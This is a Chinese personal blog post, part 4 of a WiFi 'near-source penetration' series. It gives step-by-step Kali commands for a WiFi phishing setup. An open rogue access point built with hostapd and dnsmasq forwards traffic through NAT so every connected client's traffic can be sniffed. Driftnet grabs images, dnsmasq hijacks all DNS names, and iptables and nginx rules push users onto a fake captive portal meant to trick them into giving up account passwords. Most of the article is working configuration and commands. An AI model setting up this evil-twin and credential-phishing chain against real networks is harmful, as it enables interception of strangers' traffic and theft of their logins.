
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>近源渗透(4) | likesoso - 随便写写</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <!-- Set render engine for 360 browser -->
  <meta name="renderer" content="webkit">
  <!-- No Baidu Siteapp-->
  <meta http-equiv="Cache-Control" content="no-siteapp"/>
  <meta name="description" content="&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;到这一章，我们的基础学习就已经结束了，学到了一些802.11的原理知识,以及kali下的基础操作。接下来进入正题。不难发现之前的操作，只能做一些拒绝服务攻击，或者是靠字典的强大，爆破出wifi密码，从而连接到目标网络内。接下来记录一下我的wifi钓鱼学习笔记。 安装环境一个支持AP模式的无线网卡，这里我推荐TP-LINK的TL-WN722N Ver1">
<meta property="og:type" content="article">
<meta property="og:title" content="近源渗透(4)">
<meta property="og:url" content="http://likesoso.github.io/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/index.html">
<meta property="og:site_name" content="likesoso - 随便写写">
<meta property="og:description" content="&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;到这一章，我们的基础学习就已经结束了，学到了一些802.11的原理知识,以及kali下的基础操作。接下来进入正题。不难发现之前的操作，只能做一些拒绝服务攻击，或者是靠字典的强大，爆破出wifi密码，从而连接到目标网络内。接下来记录一下我的wifi钓鱼学习笔记。 安装环境一个支持AP模式的无线网卡，这里我推荐TP-LINK的TL-WN722N Ver1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://likesoso.github.io/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/4-1.jpg">
<meta property="og:image" content="http://likesoso.github.io/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/4-2.jpg">
<meta property="og:image" content="http://likesoso.github.io/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/4-3.jpg">
<meta property="og:image" content="http://likesoso.github.io/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/4-4.jpg">
<meta property="article:published_time" content="2020-09-03T09:28:22.000Z">
<meta property="article:modified_time" content="2020-09-08T02:02:26.832Z">
<meta property="article:author" content="likesoso">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://likesoso.github.io/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/4-1.jpg">
  
  
    <link rel="icon" href="/img/likesoso.jpg">
    <meta name="mobile-web-app-capable" content="yes">
    <!-- Add to homescreen for Chrome on Android -->    
    <link rel="icon" sizes="192x192" href="/img/likesoso.jpg">
    <!-- Add to homescreen for Safari on iOS -->
    <link rel="apple-touch-icon-precomposed" href="/img/likesoso.jpg">    
    <!-- Tile icon for Win8 (144x144 + tile color) -->
    <meta name="msapplication-TileImage" content="/img/likesoso.jpg">
    <meta name="msapplication-TileColor" content="#0e90d2">
  
  
<link rel="stylesheet" href="/css/style.css">

  <!--[if lt IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script><![endif]-->
  
  
<script type="text/javascript">
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?10f2720e6f47d1b4a5ebc811df8dc361";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

<meta name="generator" content="Hexo 5.1.1"></head>
<body>
<div id="container">
  <div id="wrap">
    <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">likesoso - 随便写写</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">首页</a>
        
          <a class="main-nav-link" href="/archives">文章</a>
        
          <a class="main-nav-link" href="/about">关于</a>
        
      </nav>
      <!--
      <nav id="sub-nav">
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//www.baidu.com/baidu" method="get" accept-charset="utf-8" class="search-form">
          <input type="search" name="word" maxlength="20" class="search-form-input" placeholder="Search">
          <input type="submit" value="" class="search-form-submit">
          <input name=tn type=hidden value="bds">
          <input name=cl type=hidden value="3">
          <input name=ct type=hidden value="2097152">
          <input type="hidden" name="si" value="likesoso.github.io">
        </form>
      </div>
      -->
    </div>
  </div>
</header>
    <div class="outer">
      <section id="main"><article id="post-近源渗透-4" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/" class="article-date">
  <time datetime="2020-09-03T09:28:22.000Z" itemprop="datePublished">2020-09-03</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/wifi/">wifi</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      近源渗透(4)
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <!-- Table of Contents -->
        
        <p>&nbsp;&nbsp;&nbsp;&nbsp;到这一章，我们的基础学习就已经结束了，学到了一些802.11的原理知识,以及kali下的基础操作。接下来进入正题。不难发现之前的操作，只能做一些拒绝服务攻击，或者是靠字典的强大，爆破出wifi密码，从而连接到目标网络内。接下来记录一下我的wifi钓鱼学习笔记。</p>
<h2 id="安装环境"><a href="#安装环境" class="headerlink" title="安装环境"></a>安装环境</h2><p>一个支持AP模式的无线网卡，这里我推荐TP-LINK的TL-WN722N Ver1.0，咸鱼30rmb购得。推荐ver1版本的，ver2的kali没得自带的驱动。</p>
<p><img src="/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/4-1.jpg" alt="4-1.jpg"></p>
<p><strong>安装hostapd、dnsmasq、php等</strong></p>
<h3 id="hostpad"><a href="#hostpad" class="headerlink" title="hostpad"></a>hostpad</h3><p>实现了热点的建立，管理等功能</p>
<p>首先创建一个open.conf作为热点的配置文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">interface&#x3D;wlan0</span><br><span class="line">ssid&#x3D;FreeWIFI</span><br><span class="line">driver&#x3D;nl80211</span><br><span class="line">channel&#x3D;1</span><br><span class="line">hw_mode&#x3D;g</span><br></pre></td></tr></table></figure>
<h3 id="dnsmasq"><a href="#dnsmasq" class="headerlink" title="dnsmasq"></a>dnsmasq</h3><p>提供DNS和DHCP服务的简易轻量级配置工具</p>
<p>向/etc/dnsmasq.conf添加一条：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dhcp-range&#x3D;172.5.5.100, 172.5.5.250, 12h</span><br><span class="line">interface&#x3D;wlan0</span><br></pre></td></tr></table></figure>

<p>重启服务：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl restart dnsmasq</span><br></pre></td></tr></table></figure>

<p>运行以下命令，消除系统对网卡的影响</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">nmcli radio wifi off #表示关闭wifi</span><br><span class="line">rfkill unblock wlan #解锁无线网卡</span><br><span class="line">ifconfig wlan0 172.5.5.1&#x2F;24</span><br><span class="line">hostapd open.conf #开启wifi</span><br></pre></td></tr></table></figure>
<p>效果如下：</p>
<p><img src="/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/4-2.jpg" alt="4-2.jpg"></p>
<p>此时SSID为Freewifi的无密码wifi已经开启，但是这个wifi不能上网，我们还需要将wlan0转发到能出网的eth0上面</p>
<p>运行<code>ifconfig</code>查看外网网卡为eth0</p>
<p><img src="/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/4-3.jpg" alt="4-3.jpg"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sysctl -w net.ipv4.ip_forward&#x3D;1</span><br></pre></td></tr></table></figure>
<p>开启ip路由转发功能，这个是临时配置，修改/etc/systcl.conf 可以永久更改</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">iptables -t nat -I POSTROUTING -o eth0 -j MASQUERADE #转发</span><br></pre></td></tr></table></figure>

<p>这时钓鱼wifi已经可以连接到互联网了，用wireshark等抓包工具对eth0进行抓包。即可抓到连接wifi的客户端的所有流量。</p>
<h2 id="driftnet"><a href="#driftnet" class="headerlink" title="driftnet"></a>driftnet</h2><p>简单的图片捕获工具</p>
<p>kali安装：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt-get install driftnet</span><br><span class="line">driftnet -i eth0</span><br></pre></td></tr></table></figure>
<p>经过测试，成功率不是很高。很多图片都抓不到</p>
<h2 id="DNS-劫持"><a href="#DNS-劫持" class="headerlink" title="DNS 劫持"></a>DNS 劫持</h2><p>在本地部署钓鱼网站，无线客户端连接网络时，通过DHCP服务不仅能获得本地的ip地址，还包括DHCP服务指定的DNS解析地址。</p>
<p>先在本地搭建钓鱼网站，以flash为例子：</p>
<p>通过对DNS服务器进行配置，打开/etc/dnsmasq.conf，添加格式：address=/url/ip</p>
<p>添加一条：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">address&#x3D;&#x2F;#&#x2F;172.5.5.1</span><br><span class="line">#在url处填#，将解析所有的地址</span><br></pre></td></tr></table></figure>
<p>重启dnsmasq即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl restart dnsmasq</span><br></pre></td></tr></table></figure>

<p>之后连接上wifi之后就可以完成劫持了</p>
<h2 id="配置Captive-Protal"><a href="#配置Captive-Protal" class="headerlink" title="配置Captive Protal"></a>配置Captive Protal</h2><p>连接上免费的wifi后，要求认证。以此方式欺骗得到账号密码。</p>
<p>以android设备为例子，当设备接入无线网络时，会尝试请求访问client3.google.com/generate_204并根据返回结果来判断网络状况，返回204则表示网络正常，<strong>返回302则表示存在认证</strong>，并以弹窗的方式显示在手机中。</p>
<p><strong>1.配置iptables</strong></p>
<p>将所有的流量包丢弃，但是允许DNS查询，及向网关特定端口请求（172.5.5.1的80端口）；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">iptables -A FORWARD -i wlan0 -p tcp --dport 53 -j ACCEPT</span><br><span class="line">iptables -A FORWARD -i wlan0 -p udp --dport 53 -j ACCEPT</span><br><span class="line">iptables -A FORWARD -i wlan0 -p tcp --dport 80 -d 172.5.5.1 -j ACCEPT</span><br><span class="line">iptables -A FORWARD -i wlan0 -j DROP</span><br></pre></td></tr></table></figure>
<p>将来自nat网络对80端口的请求全部转发到172.5.5.1:80</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to-destination 172.5.5.1:80</span><br></pre></td></tr></table></figure>
<p>来自nat的dns请求都转发到172.5.5.1的53端口</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 53 -j DNAT --to-destination 172.5.5.1:53</span><br><span class="line">iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 53 -j DNAT --to-destination 172.5.5.1:53</span><br></pre></td></tr></table></figure>
<p>以上配置后，android连接到FreeWifi后，请求client3.google.com/generate_204，会被转发到172.5.5.1:80</p>
<p><strong>安装php7.4-fpm</strong><br>执行安装命令并启动服务</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">apt install php7.4-fpm</span><br><span class="line">systemctl start pap7.4-fpm</span><br><span class="line"> </span><br></pre></td></tr></table></figure>
<p><strong>配置nginx</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim &#x2F;etc&#x2F;nginx&#x2F;sites-enabled&#x2F;default</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">server &#123;</span><br><span class="line">        listen 80 default_server;</span><br><span class="line">        root &#x2F;var&#x2F;www&#x2F;html;  &#x2F;&#x2F;网站根目录</span><br><span class="line">        location &#x2F; &#123;</span><br><span class="line">                if (!-e $request_filename) &#123;</span><br><span class="line">                         rewrite ^&#x2F;(.*)$ &#x2F;index.html redirect;  &#x2F;&#x2F;访问不存在的页面会302到主页面</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">        location ~ \.php$ &#123;		&#x2F;&#x2F;支持php</span><br><span class="line">                include snippets&#x2F;fastcgi-php.conf;</span><br><span class="line">                fastcgi_pass unix:&#x2F;run&#x2F;php&#x2F;php7.4-fpm.sock;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>此时连接上wifi，会自动弹出认证界面。接下来就是自己搭建钓鱼页面然后去试试了。<br><img src="/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/4-4.jpg" alt="4-4.jpg"></p>

      
      
  <div class="article-statement">
    <hr>  
    1.如果本文帮到了您，不妨点一下右下角的 <a>分享到</a> 按钮。<br>
    2.除非注明，本博文章均为原创，转载请以链接形式标明本文地址。<br>
    3.本博文章只代表博主当时的观点或结论，与博主公司没有任何关系。<br>
  </div>

    </div>
    
    <footer class="article-footer">
      
        <a data-url="http://likesoso.github.io/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/" data-id="ckg3e0v46000uv9s63ogudots" class="article-share-link">分享到</a>
      

      
        <a href="http://likesoso.github.io/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/#disqus_thread" class="article-comment-link">评论</a>
      

      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/09/07/sqli-labs%E6%95%99%E7%A8%8B-2/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">下一篇</strong>
      <div class="article-nav-title">
        
          sqli-labs教程(2)
        
      </div>
    </a>
  
  
    <a href="/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-3/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">上一篇</strong>
      <div class="article-nav-title">近源渗透(3)</div>
    </a>
  
</nav>

  
</article>


  <section id="comments">
    <div id="disqus_thread">
      <noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
    </div>
  </section>
</section>
      
      <aside id="sidebar">
  
    <div class="widget-wrap">
  <h3 class="widget-title">about</h3>
  <div class="widget">
    <ul>
      
      
        
        
          <div style="text-align: center;">
            <img src="/img/tuitui.jpg" style="width: 100%; max-width: 250px;">
          </div>
        
        <li>
          <a href="/img/tuitui.jpg" target="_blank">1. my cat</a>
        </li>
      
        
        
        <li>
          <a href="https://github.com/likesoso" target="_blank">2. 我的「github」</a>
        </li>
      
    </ul>
  </div>
</div>
  
    <div class="widget-wrap">
  <h3 class="widget-title">推荐文章</h3>
  <div class="widget">
    <ul>
      
      
        
        <li>
          <a href="/2020/09/03/近源渗透-1/" target="_blank">1. 近源渗透1</a>
        </li>
      
        
        <li>
          <a href="/2020/09/03/近源渗透-2/" target="_blank">2. 近源渗透2</a>
        </li>
      
        
        <li>
          <a href="/2020/09/03/近源渗透-3/" target="_blank">3. 近源渗透3</a>
        </li>
      
        
        <li>
          <a href="/2020/09/03/近源渗透-4/" target="_blank">4. 近源渗透4</a>
        </li>
      
    </ul>
  </div>
</div>
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">分类</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Misc/">Misc</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/games/">games</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/mail/">mail</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/sqli/">sqli</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/src/">src</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/tools/">tools</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/wifi/">wifi</a><span class="category-list-count">4</span></li></ul>
    </div>
  </div>

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">2020年 10月</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">2020年 09月</a><span class="archive-list-count">13</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最近评论</h3>
    <div class="widget">
      <!-- 多说最新评论 start -->
      <div class="ds-recent-comments" data-num-items="5" data-show-avatars="0" data-show-time="1" data-show-title="1" data-show-admin="1" data-excerpt-length="70"></div>
      <!-- 多说最新评论 end -->
      <!-- 多说公共JS代码 start (一个网页只需插入一次) -->
      <script type="text/javascript">
        var duoshuoQuery = {short_name:"shijiajie"};
        (function() {
          var ds = document.createElement('script');
          ds.type = 'text/javascript';ds.async = true;
          ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
          ds.charset = 'UTF-8';
          (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ds);
        })();
      </script>
      <!-- 多说公共JS代码 end -->
    </div>
  </div>

  
</aside>
      
    </div>
    <footer id="footer">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
  </script>
  
  <div class="outer">
    <div id="footer-info" class="inner">
      Copyright &copy; 2012 - 2020 <a href="/" target="_blank">likesoso</a>.
      &nbsp;
      <span id="busuanzi_container_site_pv">
        总访问量 <a href="http://service.ibruce.info/" target="_blank"><span id="busuanzi_value_site_pv"></span></a> 次
      </span>
      <span id="busuanzi_container_site_uv">
        <a href="http://service.ibruce.info/" target="_blank"><span id="busuanzi_value_site_uv"></span></a> 人.
      </span>
      
    </div>
  </div>
</footer>

  </div>
  <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/archives" class="mobile-nav-link">文章</a>
  
    <a href="/about" class="mobile-nav-link">关于</a>
  
</nav>
  <!-- totop start -->
<div id="totop">
<a title="返回顶部"><img src="/img/scrollup.png"/></a>
</div>

<!-- totop end -->

<script>
  var disqus_shortname = 'likesoso';
  
  var disqus_url = 'http://likesoso.github.io/2020/09/03/%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F-4/';
  
  (function(){
    var dsq = document.createElement('script');
    dsq.type = 'text/javascript';
    dsq.async = true;
    dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
  })();
</script>


<!-- 百度分享 start -->

<!-- 百度分享 end -->

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>





<script src="/js/script.js"></script>


</div>
</body>
</html>
